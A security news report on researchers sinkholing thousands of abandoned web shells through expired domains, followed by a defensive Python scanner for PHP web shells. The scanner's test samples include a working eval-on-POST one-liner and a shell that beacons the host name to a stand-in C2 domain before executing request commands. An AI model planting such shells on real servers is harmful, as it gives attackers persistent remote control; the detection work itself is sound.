Security researchers discovered and hijacked over 4,000 unique web backdoors that had been deployed by various threat actors. The backdoors, which had been abandoned or were reliant on expired infrastructure, were seized and sinkholed by WatchTowr Labs through the purchase and registration of over 40 domain names that these backdoors used for command-and-control (C2) communications. The firm managed to gain control of the compromised systems for as little as $20 per domain.
The backdoors, which are essentially web shells designed to maintain persistent remote access to target networks, varied significantly in scope and functionality. Some were relatively simple, capable of executing attacker-supplied commands via PHP-based tools such as c99shell and r57shell, while others, such as China Chopper, were more sophisticated. China Chopper is a web shell associated with Chinese state-backed hacker groups.
Among the systems hosting those 4,000 unique, live backdoors were government entities in Bangladesh, China, and Nigeria, as well as academic institutions in China, South Korea, and Thailand.
The researchers said that several of the web shells had themselves been backdoored by their original maintainers, inadvertently leaking critical information about the locations and entities where they had been deployed. This allowed other threat actors to hijack the backdoors and use them for their own purposes.
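The two behaviours described above, a PHP web shell that executes request-supplied input, and a shell that phones home to a hard-coded domain so its deployment location leaks, both leave recognisable traces in source code. The following scanner is an added example for defenders, not WatchTowr's tooling or any code from the article: it walks PHP sources, flags the classic web shell indicators (eval or command execution fed directly from `$_POST`/`$_GET`/`$_REQUEST`, decoding chains, outbound-fetch functions) and extracts any embedded callback hostnames, which is what an operator would use to find shells and identify which external domains they contact. The sample files and the host `c2.example.invalid` are constructed for the demonstration; the `.invalid` TLD is reserved and never resolves.

```python
import re
from pathlib import Path

# Constructed sample PHP sources (not real samples from any incident).
SAMPLES = {
    # Benign page: should produce no indicators.
    "index.php": "<?php echo 'Hello'; ?>",
    # Minimal eval-on-request-input shell, the China Chopper style one-liner.
    "upload/img.php": "<?php @eval($_POST['cmd']); ?>",
    # Shell that beacons its host name to a hard-coded domain, then runs commands.
    "cache/tmp.php": (
        "<?php\n"
        "$u = 'http://c2.example.invalid/ping.php?h=' . urlencode($_SERVER['HTTP_HOST']);\n"
        "@file_get_contents($u);\n"
        "if (isset($_REQUEST['x'])) { system($_REQUEST['x']); }\n"
    ),
}

REQ = r"\$_(?:POST|GET|REQUEST|COOKIE)"

# (regex, label, strong). Strong indicators alone mark a file suspicious;
# weak ones are reported for context because they also occur in legitimate code.
INDICATORS = [
    (re.compile(r"\beval\s*\(\s*(?:@?\s*)?(?:base64_decode|gzinflate|str_rot13|" + REQ + r")", re.I),
     "eval on request input or decoded payload", True),
    (re.compile(r"\b(?:system|passthru|shell_exec|exec|popen|proc_open)\s*\(\s*" + REQ, re.I),
     "command execution on request input", True),
    (re.compile(r"\bpreg_replace\s*\(\s*['\"][^'\"]*/[a-z]*e[a-z]*['\"]", re.I),
     "preg_replace with /e modifier (code execution)", True),
    (re.compile(r"\b(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
     "decoding/obfuscation function", False),
    (re.compile(r"\b(?:file_get_contents|curl_exec|fsockopen|mail)\s*\(", re.I),
     "outbound callback capability", False),
]

# Hostnames embedded in http(s) URLs inside the source.
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)


def scan_source(src: str) -> dict:
    """Return indicator labels, embedded callback hosts, and a verdict for one PHP source."""
    hits = [(label, strong) for rx, label, strong in INDICATORS if rx.search(src)]
    hosts = sorted({h.lower() for h in URL_HOST.findall(src)})
    return {
        "indicators": [label for label, _ in hits],
        "callback_hosts": hosts,
        # Strong indicator => suspicious; a weak indicator combined with an embedded
        # callback host is also worth an analyst's attention.
        "suspicious": any(strong for _, strong in hits) or (bool(hits) and bool(hosts)),
    }


def scan_samples(samples: dict = SAMPLES) -> dict:
    """Scan the in-memory constructed samples; key is the pseudo file path."""
    return {path: scan_source(src) for path, src in samples.items()}


def scan_directory(root: str) -> dict:
    """Scan every *.php file under root on disk (hypothetical helper for real use)."""
    results = {}
    for p in Path(root).rglob("*.php"):
        try:
            results[str(p)] = scan_source(p.read_text(errors="replace"))
        except OSError:
            continue
    return results


if __name__ == "__main__":
    for path, r in scan_samples().items():
        flag = "SUSPICIOUS" if r["suspicious"] else "clean"
        print(f"{path}: {flag}; indicators={r['indicators']}; hosts={r['callback_hosts']}")
```

The callback host list is the actionable part for the situation the article describes: once a shell's hard-coded domain is known, a defender can check whether it is still registered, block it at the egress proxy, and look for historical DNS or proxy log entries to that host to find other affected servers. Regex matching of this kind is only a triage step; heavily obfuscated shells will need a PHP-aware deobfuscator or runtime inspection.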